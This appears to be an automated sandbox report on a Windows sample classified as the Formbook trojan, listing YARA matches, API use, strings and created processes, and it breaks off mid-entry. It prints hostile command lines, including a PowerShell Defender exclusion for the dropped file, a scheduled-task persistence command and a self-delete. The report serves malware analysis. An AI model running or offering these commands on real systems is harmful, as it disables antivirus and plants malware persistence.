Source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 22#U0415.exe PID: 6372, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 3848, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: tsnokiirph.exe PID: 7108, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: systray.exe PID: 3264, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 7080, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: 22#U0415.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tsnokiirph.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.22#U0415.exe.29515f0.4.raw.unpack, gk.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.22#U0415.exe.29515f0.4.raw.unpack, gk.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.22#U0415.exe.8dd0000.11.raw.unpack, gk.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.22#U0415.exe.8dd0000.11.raw.unpack, gk.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.tsnokiirph.exe.3431860.8.raw.unpack, gk.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.tsnokiirph.exe.3431860.8.raw.unpack, gk.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, RmmfobAaGMSx3h70xK.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, RmmfobAaGMSx3h70xK.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, IvcPPEq9R8umsYYues.cs	Security API names: _0020.SetAccessControl
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, IvcPPEq9R8umsYYues.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, IvcPPEq9R8umsYYues.cs	Security API names: _0020.AddAccessRule
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, RmmfobAaGMSx3h70xK.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, IvcPPEq9R8umsYYues.cs	Security API names: _0020.SetAccessControl
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, IvcPPEq9R8umsYYues.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, IvcPPEq9R8umsYYues.cs	Security API names: _0020.AddAccessRule
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, IvcPPEq9R8umsYYues.cs	Security API names: _0020.SetAccessControl
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, IvcPPEq9R8umsYYues.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, IvcPPEq9R8umsYYues.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.evad.winEXE@189/11@4/3

Source: C:\Users\user\Desktop\22#U0415.exe

File created: C:\Users\user\AppData\Roaming\tsnokiirph.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Mutant created: \Sessions\1\BaseNamedObjects\CwpGyVVeYElmmBmiB
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03

Source: C:\Users\user\Desktop\22#U0415.exe

File created: C:\Users\user\AppData\Local\Temp\tmp7F5F.tmp

Jump to behavior

Source: 22#U0415.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 22#U0415.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\22#U0415.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\22#U0415.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\22#U0415.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO [dbo].[CayDanhMuc] ([MaDMCha], [MaDMCon]) VALUES (@MaDMCha, @MaDMCon);
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE [dbo].[DMTL] SET [MaDM] = @MaDM, [MaTL] = @MaTL WHERE (([MaDM] = @Original_MaDM) AND ([MaTL] = @Original_MaTL));
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Insert into TaiLieu(LoaiTaiLieu, TacGia, TieuDe, Nam, TomTat, [File], URL, DOI)values(@LoaiTaiLieu, @TacGia, @TieuDe, @Nam, @TomTat, @File, @URL, @DOI);SELECT CAST(scope_identity() AS int);
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO [dbo].[Sach] ([MaTL], [NhaXB], [TaiBan], [ThanhPho]) VALUES (@MaTL, @NhaXB, @TaiBan, @ThanhPho);
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Insert into CayDanhMuc(MaDMCha,MaDMCon)values(@MaDMCha,@MaDMCon);
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO [dbo].[TrangWeb] ([MaTL], [ToChuc], [Ngay], [Thang], [NgayTruyCap]) VALUES (@MaTL, @ToChuc, @Ngay, @Thang, @NgayTruyCap);
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE [dbo].[CayDanhMuc] SET [MaDMCha] = @MaDMCha, [MaDMCon] = @MaDMCon WHERE (([MaDMCha] = @Original_MaDMCha) AND ([MaDMCon] = @Original_MaDMCon));
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO [dbo].[DMTL] ([MaDM], [MaTL]) VALUES (@MaDM, @MaTL);
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE [dbo].[TaiLieu] SET [LoaiTaiLieu] = @LoaiTaiLieu, [TacGia] = @TacGia, [TieuDe] = @TieuDe, [Nam] = @Nam, [TomTat] = @TomTat, [GhiChu] = @GhiChu, [File] = @File, [URL] = @URL, [DOI] = @DOI WHERE (([MaTL] = @Original_MaTL) AND ([LoaiTaiLieu] = @Original_LoaiTaiLieu) AND ((@IsNull_TacGia = 1 AND [TacGia] IS NULL) OR ([TacGia] = @Original_TacGia)) AND ([TieuDe] = @Original_TieuDe) AND ((@IsNull_Nam = 1 AND [Nam] IS NULL) OR ([Nam] = @Original_Nam)) AND ((@IsNull_File = 1 AND [File] IS NULL) OR ([File] = @Original_File)) AND ((@IsNull_URL = 1 AND [URL] IS NULL) OR ([URL] = @Original_URL)) AND ((@IsNull_DOI = 1 AND [DOI] IS NULL) OR ([DOI] = @Original_DOI)));
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE [dbo].[TrangWeb] SET [MaTL] = @MaTL, [ToChuc] = @ToChuc, [Ngay] = @Ngay, [Thang] = @Thang, [NgayTruyCap] = @NgayTruyCap WHERE (([MaTL] = @Original_MaTL) AND ((@IsNull_ToChuc = 1 AND [ToChuc] IS NULL) OR ([ToChuc] = @Original_ToChuc)) AND ((@IsNull_Ngay = 1 AND [Ngay] IS NULL) OR ([Ngay] = @Original_Ngay)) AND ((@IsNull_Thang = 1 AND [Thang] IS NULL) OR ([Thang] = @Original_Thang)) AND ((@IsNull_NgayTruyCap = 1 AND [NgayTruyCap] IS NULL) OR ([NgayTruyCap] = @Original_NgayTruyCap)));
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE [dbo].[DanhMuc] SET [TenDanhMuc] = @TenDanhMuc WHERE (([MaDM] = @Original_MaDM) AND ([TenDanhMuc] = @Original_TenDanhMuc));
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Insert into TaiLieu(LoaiTaiLieu, TacGia, TieuDe, Nam, TomTat, [File], URL, DOI)values(@LoaiTaiLieu, @TacGia, @TieuDe, @Nam, @TomTat, @File, @URL, @DOI);SELECT CAST(scope_identity() AS int);3Insert into DMTL(MaDM, MaTL) values (@MaDM, @MaTL);dInsert into BaiBao(MaTL, TapChi, Trang, Volume, Issue)values(@MaTL,@TapChi, @Trang, @Volume, @Issue)nInsert into TrangWeb(MaTL, ToChuc, Ngay, Thang, NgayTruyCap)values(@MaTL,@ToChuc, @Ngay, @Thang, @NgayTruyCap)
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO [dbo].[BaiBao] ([MaTL], [TapChi], [Trang], [Volume], [Issue]) VALUES (@MaTL, @TapChi, @Trang, @Volume, @Issue);
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE [dbo].[BaiBao] SET [MaTL] = @MaTL, [TapChi] = @TapChi, [Trang] = @Trang, [Volume] = @Volume, [Issue] = @Issue WHERE (([MaTL] = @Original_MaTL) AND ((@IsNull_TapChi = 1 AND [TapChi] IS NULL) OR ([TapChi] = @Original_TapChi)) AND ((@IsNull_Trang = 1 AND [Trang] IS NULL) OR ([Trang] = @Original_Trang)) AND ((@IsNull_Volume = 1 AND [Volume] IS NULL) OR ([Volume] = @Original_Volume)) AND ((@IsNull_Issue = 1 AND [Issue] IS NULL) OR ([Issue] = @Original_Issue)));
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Insert into DanhMuc(TenDanhMuc)values(@TenDanhMuc);SELECT CAST(scope_identity() AS int);A
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO [dbo].[DanhMuc] ([TenDanhMuc]) VALUES (@TenDanhMuc);
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE [dbo].[Sach] SET [MaTL] = @MaTL, [NhaXB] = @NhaXB, [TaiBan] = @TaiBan, [ThanhPho] = @ThanhPho WHERE (([MaTL] = @Original_MaTL) AND ((@IsNull_NhaXB = 1 AND [NhaXB] IS NULL) OR ([NhaXB] = @Original_NhaXB)) AND ((@IsNull_TaiBan = 1 AND [TaiBan] IS NULL) OR ([TaiBan] = @Original_TaiBan)) AND ((@IsNull_ThanhPho = 1 AND [ThanhPho] IS NULL) OR ([ThanhPho] = @Original_ThanhPho)));
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO [dbo].[TaiLieu] ([LoaiTaiLieu], [TacGia], [TieuDe], [Nam], [TomTat], [GhiChu], [File], [URL], [DOI]) VALUES (@LoaiTaiLieu, @TacGia, @TieuDe, @Nam, @TomTat, @GhiChu, @File, @URL, @DOI);
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO [dbo].[Proceeding] ([MaTL], [TenHoiNghi], [ThanhPho]) VALUES (@MaTL, @TenHoiNghi, @ThanhPho);
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE [dbo].[Proceeding] SET [MaTL] = @MaTL, [TenHoiNghi] = @TenHoiNghi, [ThanhPho] = @ThanhPho WHERE (([MaTL] = @Original_MaTL) AND ((@IsNull_TenHoiNghi = 1 AND [TenHoiNghi] IS NULL) OR ([TenHoiNghi] = @Original_TenHoiNghi)) AND ((@IsNull_ThanhPho = 1 AND [ThanhPho] IS NULL) OR ([ThanhPho] = @Original_ThanhPho)));
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Insert into DMTL(MaDM, MaTL) values (@MaDM, @MaTL);

Source: 22#U0415.exe	ReversingLabs: Detection: 32%
Source: 22#U0415.exe	Virustotal: Detection: 47%

Source: C:\Users\user\Desktop\22#U0415.exe

File read: C:\Users\user\Desktop\22#U0415.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\22#U0415.exe C:\Users\user\Desktop\22#U0415.exe
Source: C:\Users\user\Desktop\22#U0415.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tsnokiirph.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\22#U0415.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp7F5F.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\22#U0415.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tsnokiirph.exe C:\Users\user\AppData\Roaming\tsnokiirph.exe
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp8942.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\22#U0415.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tsnokiirph.exe	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp7F5F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp8942.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\22#U0415.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\22#U0415.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 22#U0415.exe

